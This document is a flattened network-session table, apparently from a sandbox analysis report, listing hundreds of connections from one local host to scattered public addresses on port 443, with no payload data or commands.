                                                17037192.168.2.235033466.64.146.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17038192.168.2.234795499.44.195.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17039192.168.2.234791032.189.180.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17040192.168.2.235304013.159.126.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17041192.168.2.235674235.149.118.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17042192.168.2.2350086152.243.214.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17043192.168.2.234374283.166.172.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17044192.168.2.2360840195.194.188.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17045192.168.2.2338382158.196.209.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17046192.168.2.235438431.32.57.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17047192.168.2.2341278210.217.78.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17048192.168.2.2360062148.191.181.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17049192.168.2.234356246.41.81.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17050192.168.2.23403481.23.28.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17051192.168.2.2358898122.143.82.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17052192.168.2.2344494203.105.58.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17053192.168.2.2339126176.236.249.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17054192.168.2.233890283.144.195.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17055192.168.2.2359400171.8.37.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17056192.168.2.2333544178.248.142.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17057192.168.2.235513832.90.41.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17058192.168.2.2347856213.36.190.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17059192.168.2.235019431.86.28.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17060192.168.2.235146087.248.231.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17061192.168.2.233523461.90.13.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17062192.168.2.2334316185.102.11.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17063192.168.2.2344650210.40.216.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17064192.168.2.234198812.254.245.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17065192.168.2.2359598195.27.109.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17066192.168.2.233413244.168.172.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17067192.168.2.2355904165.118.173.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17068192.168.2.2352570144.223.230.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17069192.168.2.235587293.25.206.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17070192.168.2.2346204107.228.52.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17071192.168.2.2358888195.235.245.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17072192.168.2.235992294.203.122.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17073192.168.2.234102250.242.79.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17074192.168.2.2357066194.218.26.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17075192.168.2.235090650.138.20.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17076192.168.2.233525499.94.124.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17077192.168.2.2346480205.226.193.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17078192.168.2.235902844.190.185.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17079192.168.2.2342318165.16.159.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17080192.168.2.23508269.6.86.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17081192.168.2.233328675.31.62.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17082192.168.2.2333830133.162.112.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17083192.168.2.236057620.202.63.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17084192.168.2.2333596158.73.253.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17085192.168.2.234974898.254.14.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17086192.168.2.234227054.240.20.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17087192.168.2.2344576177.234.33.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17088192.168.2.2338912168.27.138.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17089192.168.2.2333494119.123.65.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17090192.168.2.234807438.137.240.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17091192.168.2.2337894220.147.4.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17092192.168.2.234137274.228.148.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17093192.168.2.2343120105.69.219.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17094192.168.2.233485897.39.129.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17095192.168.2.235556049.147.70.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17096192.168.2.2359654192.195.207.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17097192.168.2.233956859.92.199.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17098192.168.2.2356776102.146.252.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17099192.168.2.2343964155.133.36.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17100192.168.2.2335522180.193.114.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17101192.168.2.2356710137.240.27.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17102192.168.2.2354400132.87.239.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17103192.168.2.2360194179.62.230.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17104192.168.2.2345590159.198.30.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17105192.168.2.235635260.110.36.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17106192.168.2.234413242.186.216.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17107192.168.2.2341928210.55.116.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17108192.168.2.2350120194.11.167.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17109192.168.2.2357326188.7.215.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17110192.168.2.2360512218.175.164.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17111192.168.2.2357654156.12.84.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17112192.168.2.234777634.45.87.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17113192.168.2.2345418163.136.110.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17114192.168.2.233353231.44.71.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17115192.168.2.2340642203.95.42.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17116192.168.2.2344676220.251.11.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17117192.168.2.234901252.73.13.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17118192.168.2.235671018.53.112.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17119192.168.2.234133058.149.221.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17120192.168.2.2334344199.66.243.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17121192.168.2.2350566213.248.170.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17122192.168.2.234832069.79.159.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17123192.168.2.2356052167.183.12.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17124192.168.2.2333844179.57.188.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17125192.168.2.2338798101.60.54.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17126192.168.2.2344428183.83.172.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17127192.168.2.234885860.250.27.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17128192.168.2.2342762148.113.222.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17129192.168.2.235377040.181.164.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17130192.168.2.2337334109.197.32.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17131192.168.2.2352908175.208.178.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17132192.168.2.2336656115.232.98.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17133192.168.2.234392617.231.138.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17134192.168.2.2345030109.19.144.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17135192.168.2.2342830110.201.126.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17136192.168.2.2343030116.133.166.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17137192.168.2.2348220134.182.239.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17138192.168.2.2335598198.95.142.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17139192.168.2.2359616132.237.30.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17140192.168.2.236012235.73.241.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17141192.168.2.2350180189.87.48.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17142192.168.2.2338958151.147.245.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17143192.168.2.2358170148.218.50.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17144192.168.2.2339734125.243.80.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17145192.168.2.233386418.239.162.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17146192.168.2.233563832.55.223.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17147192.168.2.234540490.154.108.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17148192.168.2.2335976177.124.92.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17149192.168.2.2359600126.224.93.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17150192.168.2.234441860.124.61.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17151192.168.2.2336614118.47.176.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17152192.168.2.233916264.82.124.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17153192.168.2.2333726154.142.137.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17154192.168.2.236075866.255.78.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17155192.168.2.2360796164.6.169.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17156192.168.2.235257239.61.223.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17157192.168.2.234790279.37.232.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17158192.168.2.2356776124.47.32.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17159192.168.2.234104465.216.155.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17160192.168.2.2332980216.77.18.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17161192.168.2.233665647.85.191.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17162192.168.2.233795034.120.34.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17163192.168.2.235697672.65.13.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17164192.168.2.233930617.237.250.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17165192.168.2.2344092140.144.42.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17166192.168.2.2335296206.132.92.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17167192.168.2.2349840186.165.144.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17168192.168.2.2340424106.202.219.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17169192.168.2.235133496.54.169.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17170192.168.2.236043489.247.82.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17171192.168.2.2347632213.48.201.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17172192.168.2.234536272.126.78.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17173192.168.2.2347726194.12.39.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17174192.168.2.2343988222.56.216.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17175192.168.2.235098472.210.204.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17176192.168.2.2355268203.60.220.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17177192.168.2.234639473.20.150.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17178192.168.2.234092872.11.3.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17179192.168.2.2347086117.35.163.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17180192.168.2.233506092.175.249.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17181192.168.2.2350198175.131.133.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17182192.168.2.235824288.72.121.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17183192.168.2.233676279.234.244.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17184192.168.2.2342276140.187.4.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17185192.168.2.2349280102.51.42.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17186192.168.2.2358656150.171.88.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17187192.168.2.2353570133.231.169.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17188192.168.2.235500059.114.247.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17189192.168.2.2345034168.138.93.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17190192.168.2.233586860.101.166.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17191192.168.2.233729045.109.96.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192192.168.2.2343968111.69.82.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17193192.168.2.235876450.24.89.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17194192.168.2.2334894114.0.158.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17195192.168.2.235841248.9.16.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17196192.168.2.2335120223.74.252.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17197192.168.2.2355418128.24.21.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17198192.168.2.233938213.25.156.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17199192.168.2.2348120210.190.34.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17200192.168.2.234792885.203.237.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17201192.168.2.235904038.32.133.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17202192.168.2.234955269.108.1.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17203192.168.2.2357386129.125.96.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17204192.168.2.235919260.231.61.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17205192.168.2.2337736197.174.236.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17206192.168.2.23576248.147.33.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17207192.168.2.2356112201.243.230.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17208192.168.2.23562224.5.196.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17209192.168.2.2348498148.224.106.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17210192.168.2.2357448106.40.246.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17211192.168.2.2333460140.11.64.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17212192.168.2.2355270113.240.0.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17213192.168.2.235871444.11.249.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17214192.168.2.2358782223.63.85.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17215192.168.2.233575680.140.225.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17216192.168.2.235840831.65.231.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17217192.168.2.2342028149.87.95.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17218192.168.2.2343470216.32.31.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17219192.168.2.2347550153.202.156.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17220192.168.2.2338786160.22.192.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17221192.168.2.233301672.63.233.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17222192.168.2.233636651.198.237.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17223192.168.2.2346268117.154.126.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17224192.168.2.234793234.34.215.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17225192.168.2.2352414182.212.202.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17226192.168.2.2355174124.84.52.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17227192.168.2.2335830174.159.234.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17228192.168.2.235404672.166.10.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17229192.168.2.2347036117.34.242.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17230192.168.2.235280613.209.43.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17231192.168.2.2341790193.221.222.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17232192.168.2.2352952153.133.189.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17233192.168.2.2356492209.1.211.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17234192.168.2.23444021.158.251.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17235192.168.2.2350092195.172.19.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17236192.168.2.2342644187.109.140.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17237192.168.2.2351108141.18.17.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17238192.168.2.2333174157.215.90.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17239192.168.2.2351274154.211.250.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17240192.168.2.233618446.64.102.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17241192.168.2.2347202130.213.240.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17242192.168.2.2334946101.95.44.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17243192.168.2.2357986160.136.108.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17244192.168.2.2344898139.189.121.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17245192.168.2.23538122.13.184.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17246192.168.2.2352486141.175.102.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17247192.168.2.235146034.198.83.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17248192.168.2.2344380154.208.102.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17249192.168.2.2335706109.178.182.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17250192.168.2.2355636155.9.138.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17251192.168.2.2342234140.168.85.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17252192.168.2.2350932184.252.64.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17253192.168.2.2341284145.18.9.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17254192.168.2.2357278115.148.150.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17255192.168.2.234092450.6.54.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17256192.168.2.2353772196.164.207.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17257192.168.2.2335146110.29.143.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17258192.168.2.234129293.220.97.246443
                                                TimestampBytes transferredDirectionData


